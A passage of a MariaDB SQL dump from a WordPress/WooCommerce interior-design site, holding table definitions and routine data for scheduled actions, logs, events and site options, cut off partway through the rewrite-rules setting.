/*!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.5.25-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: fmedia_wp860
-- ------------------------------------------------------
-- Server version	10.5.25-MariaDB

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wpev_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wpev_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) NOT NULL,
  `status` varchar(20) NOT NULL,
  `scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) DEFAULT NULL,
  `schedule` longtext DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_actionscheduler_actions`
--

LOCK TABLES `wpev_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wpev_actionscheduler_actions` DISABLE KEYS */;
INSERT INTO `wpev_actionscheduler_actions` VALUES (12,'action_scheduler/migration_hook','complete','2022-11-14 03:29:38','2022-11-14 03:29:38','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1668396578;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1668396578;}',1,1,'2022-11-14 03:30:02','2022-11-14 03:30:02',0,NULL),(13,'woocommerce_cleanup_draft_orders','complete','2022-11-14 03:28:39','2022-11-14 03:28:39','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1668396519;s:18:\"\0*\0first_timestamp\";i:1668396519;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1668396519;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',0,1,'2022-11-14 03:28:40','2022-11-14 03:28:40',0,NULL),(14,'woocommerce_cleanup_draft_orders','pending','2022-11-15 03:28:40','2022-11-15 03:28:40','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1668482920;s:18:\"\0*\0first_timestamp\";i:1668396519;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1668482920;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),(15,'woocommerce_admin/stored_state_setup_for_products/async/run_remote_notifications','complete','0000-00-00 00:00:00','0000-00-00 00:00:00','[]','O:28:\"ActionScheduler_NullSchedule\":0:{}',0,1,'2022-11-14 03:31:02','2022-11-14 03:31:02',0,NULL);
/*!40000 ALTER TABLE `wpev_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_actionscheduler_claims`
--

DROP TABLE IF EXISTS `wpev_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_actionscheduler_claims`
--

LOCK TABLES `wpev_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wpev_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_actionscheduler_groups`
--

DROP TABLE IF EXISTS `wpev_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_actionscheduler_groups`
--

LOCK TABLES `wpev_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wpev_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wpev_actionscheduler_groups` VALUES (1,'action-scheduler-migration');
/*!40000 ALTER TABLE `wpev_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_actionscheduler_logs`
--

DROP TABLE IF EXISTS `wpev_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action_id` bigint(20) unsigned NOT NULL,
  `message` text NOT NULL,
  `log_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_actionscheduler_logs`
--

LOCK TABLES `wpev_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wpev_actionscheduler_logs` DISABLE KEYS */;
INSERT INTO `wpev_actionscheduler_logs` VALUES (1,12,'action created','2022-11-14 03:28:38','2022-11-14 03:28:38'),(2,13,'action created','2022-11-14 03:28:39','2022-11-14 03:28:39'),(3,13,'action started via WP Cron','2022-11-14 03:28:40','2022-11-14 03:28:40'),(4,13,'action complete via WP Cron','2022-11-14 03:28:40','2022-11-14 03:28:40'),(5,14,'action created','2022-11-14 03:28:40','2022-11-14 03:28:40'),(6,12,'action started via Async Request','2022-11-14 03:30:02','2022-11-14 03:30:02'),(7,12,'action complete via Async Request','2022-11-14 03:30:02','2022-11-14 03:30:02'),(8,15,'action created','2022-11-14 03:31:00','2022-11-14 03:31:00'),(9,15,'action started via Async Request','2022-11-14 03:31:02','2022-11-14 03:31:02'),(10,15,'action complete via Async Request','2022-11-14 03:31:02','2022-11-14 03:31:02');
/*!40000 ALTER TABLE `wpev_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_commentmeta`
--

DROP TABLE IF EXISTS `wpev_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=35 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_commentmeta`
--

LOCK TABLES `wpev_commentmeta` WRITE;
/*!40000 ALTER TABLE `wpev_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_comments`
--

DROP TABLE IF EXISTS `wpev_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10)),
  KEY `woo_idx_comment_type` (`comment_type`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_comments`
--

LOCK TABLES `wpev_comments` WRITE;
/*!40000 ALTER TABLE `wpev_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_e_events`
--

DROP TABLE IF EXISTS `wpev_e_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_e_events` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `event_data` text DEFAULT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `created_at_index` (`created_at`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_e_events`
--

LOCK TABLES `wpev_e_events` WRITE;
/*!40000 ALTER TABLE `wpev_e_events` DISABLE KEYS */;
INSERT INTO `wpev_e_events` VALUES (1,'{\"event\":\"modal load\",\"version\":\"\",\"details\":\"{\\\"placement\\\":\\\"Onboarding wizard\\\",\\\"step\\\":\\\"account\\\",\\\"user_state\\\":\\\"anon\\\"}\",\"ts\":\"2022-11-14T10:28:37.321-07:00\"}','2022-11-14 10:28:37'),(2,'{\"event\":\"close modal\",\"version\":\"\",\"details\":\"{\\\"placement\\\":\\\"Onboarding wizard\\\",\\\"step\\\":\\\"account\\\"}\",\"ts\":\"2022-11-14T10:28:40.267-07:00\"}','2022-11-14 10:28:40');
/*!40000 ALTER TABLE `wpev_e_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_e_submissions`
--

DROP TABLE IF EXISTS `wpev_e_submissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_e_submissions` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` varchar(60) DEFAULT NULL,
  `hash_id` varchar(60) NOT NULL,
  `main_meta_id` bigint(20) unsigned NOT NULL COMMENT 'Id of main field. to represent the main meta field',
  `post_id` bigint(20) unsigned NOT NULL,
  `referer` varchar(500) NOT NULL,
  `referer_title` varchar(300) DEFAULT NULL,
  `element_id` varchar(20) NOT NULL,
  `form_name` varchar(60) NOT NULL,
  `campaign_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `user_ip` varchar(46) NOT NULL,
  `user_agent` text NOT NULL,
  `actions_count` int(11) DEFAULT 0,
  `actions_succeeded_count` int(11) DEFAULT 0,
  `status` varchar(20) NOT NULL,
  `is_read` tinyint(1) NOT NULL DEFAULT 0,
  `meta` text DEFAULT NULL,
  `created_at_gmt` datetime NOT NULL,
  `updated_at_gmt` datetime NOT NULL,
  `created_at` datetime NOT NULL,
  `updated_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `hash_id_unique_index` (`hash_id`),
  KEY `main_meta_id_index` (`main_meta_id`),
  KEY `hash_id_index` (`hash_id`),
  KEY `type_index` (`type`),
  KEY `post_id_index` (`post_id`),
  KEY `element_id_index` (`element_id`),
  KEY `campaign_id_index` (`campaign_id`),
  KEY `user_id_index` (`user_id`),
  KEY `user_ip_index` (`user_ip`),
  KEY `status_index` (`status`),
  KEY `is_read_index` (`is_read`),
  KEY `created_at_gmt_index` (`created_at_gmt`),
  KEY `updated_at_gmt_index` (`updated_at_gmt`),
  KEY `created_at_index` (`created_at`),
  KEY `updated_at_index` (`updated_at`),
  KEY `referer_index` (`referer`(191)),
  KEY `referer_title_index` (`referer_title`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_e_submissions`
--

LOCK TABLES `wpev_e_submissions` WRITE;
/*!40000 ALTER TABLE `wpev_e_submissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_e_submissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_e_submissions_actions_log`
--

DROP TABLE IF EXISTS `wpev_e_submissions_actions_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_e_submissions_actions_log` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `submission_id` bigint(20) unsigned NOT NULL,
  `action_name` varchar(60) NOT NULL,
  `action_label` varchar(60) DEFAULT NULL,
  `status` varchar(20) NOT NULL,
  `log` text DEFAULT NULL,
  `created_at_gmt` datetime NOT NULL,
  `updated_at_gmt` datetime NOT NULL,
  `created_at` datetime NOT NULL,
  `updated_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `submission_id_index` (`submission_id`),
  KEY `action_name_index` (`action_name`),
  KEY `status_index` (`status`),
  KEY `created_at_gmt_index` (`created_at_gmt`),
  KEY `updated_at_gmt_index` (`updated_at_gmt`),
  KEY `created_at_index` (`created_at`),
  KEY `updated_at_index` (`updated_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_e_submissions_actions_log`
--

LOCK TABLES `wpev_e_submissions_actions_log` WRITE;
/*!40000 ALTER TABLE `wpev_e_submissions_actions_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_e_submissions_actions_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_e_submissions_values`
--

DROP TABLE IF EXISTS `wpev_e_submissions_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_e_submissions_values` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `submission_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `key` varchar(60) DEFAULT NULL,
  `value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `submission_id_index` (`submission_id`),
  KEY `key_index` (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_e_submissions_values`
--

LOCK TABLES `wpev_e_submissions_values` WRITE;
/*!40000 ALTER TABLE `wpev_e_submissions_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_e_submissions_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_links`
--

DROP TABLE IF EXISTS `wpev_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_links`
--

LOCK TABLES `wpev_links` WRITE;
/*!40000 ALTER TABLE `wpev_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_options`
--

DROP TABLE IF EXISTS `wpev_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=15105 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_options`
--

LOCK TABLES `wpev_options` WRITE;
/*!40000 ALTER TABLE `wpev_options` DISABLE KEYS */;
INSERT INTO `wpev_options` VALUES (1,'siteurl','https://bauhaus.futuremediatrix.com','yes'),(2,'home','https://bauhaus.futuremediatrix.com','yes'),(3,'blogname','Bauhaus Living','yes'),(4,'blogdescription','Bauhaus Living: Your Premium Interior Designer','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','ardy@futuremediatrix.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','d/m/Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(29,'rewrite_rules','a:269:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:10:\"project/?$\";s:32:\"index.php?post_type=ova_projects\";s:40:\"project/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?post_type=ova_projects&feed=$matches[1]\";s:35:\"project/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?post_type=ova_projects&feed=$matches[1]\";s:27:\"project/page/([0-9]{1,})/?$\";s:50:\"index.php?post_type=ova_projects&paged=$matches[1]\";s:10:\"service/?$\";s:27:\"index.php?post_type=ova_sev\";s:40:\"service/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=ova_sev&feed=$matches[1]\";s:35:\"service/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=ova_sev&feed=$matches[1]\";s:27:\"service/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=ova_sev&paged=$matches[1]\";s:7:\"team/?$\";s:24:\"index.php?post_type=team\";s:37:\"team/feed/(feed|rdf|rss|rss2|atom)/?$\";s:41:\"index.php?post_type=team&feed=$matches[1]\";s:32:\"team/(feed|rdf|rss|rss2|atom)/?$\";s:41:\"index.php?post_type=team&feed=$matches[1]\";s:24:\"team/page/([0-9]{1,})/?$\";s:42:\"index.php?post_type=team&paged=$matches[1]\";s:34:\"wpcode/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"wpcode/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"wpcode/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"wpcode/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"wpcode/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"wpcode/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:23:\"wpcode/([^/]+)/embed/?$\";s:39:\"index.php?wpcode=$matches[1]&embed=true\";s:27:\"wpcode/([^/]+)/trackback/?$\";s:33:\"index.php?wpcode=$matches[1]&tb=1\";s:35:\"wpcode/([^/]+)/page/?([0-9]{1,})/?$\";s:46:\"index.php?wpcode=$matches[1]&paged=$matches[2]\";s:42:\"wpcode/([^/]+)/comment-page-([0-9]{1,})/?$\";s:46:\"index.php?wpcode=$matches[1]&cpage=$matches[2]\";s:31:\"wpcode/([^/]+)(?:/([0-9]+))?/?$\";s:45:\"index.php?wpcode=$matches[1]&page=$matches[2]\";s:23:\"wpcode/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:33:\"wpcode/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:53:\"wpcode/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"wpcode/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"wpcode/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:29:\"wpcode/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:52:\"wpcode_type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?wpcode_type=$matches[1]&feed=$matches[2]\";s:47:\"wpcode_type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?wpcode_type=$matches[1]&feed=$matches[2]\";s:28:\"wpcode_type/([^/]+)/embed/?$\";s:44:\"index.php?wpcode_type=$matches[1]&embed=true\";s:40:\"wpcode_type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?wpcode_type=$matches[1]&paged=$matches[2]\";s:22:\"wpcode_type/([^/]+)/?$\";s:33:\"index.php?wpcode_type=$matches[1]\";s:56:\"wpcode_location/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?wpcode_location=$matches[1]&feed=$matches[2]\";s:51:\"wpcode_location/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?wpcode_location=$matches[1]&feed=$matches[2]\";s:32:\"wpcode_location/([^/]+)/embed/?$\";s:48:\"index.php?wpcode_location=$matches[1]&embed=true\";s:44:\"wpcode_location/([^/]+)/page/?([0-9]{1,})/?$\";s:55:\"index.php?wpcode_location=$matches[1]&paged=$matches[2]\";s:26:\"wpcode_location/([^/]+)/?$\";s:37:\"index.php?wpcode_location=$matches[1]\";s:52:\"wpcode_tags/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?wpcode_tags=$matches[1]&feed=$matches[2]\";s:47:\"wpcode_tags/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?wpcode_tags=$matches[1]&feed=$matches[2]\";s:28:\"wpcode_tags/([^/]+)/embed/?$\";s:44:\"index.php?wpcode_tags=$matches[1]&embed=true\";s:40:\"wpcode_tags/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?wpcode_tags=$matches[1]&paged=$matches[2]\";s:22:\"wpcode_tags/([^/]+)/?$\";s:33:\"index.php?wpcode_tags=$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15: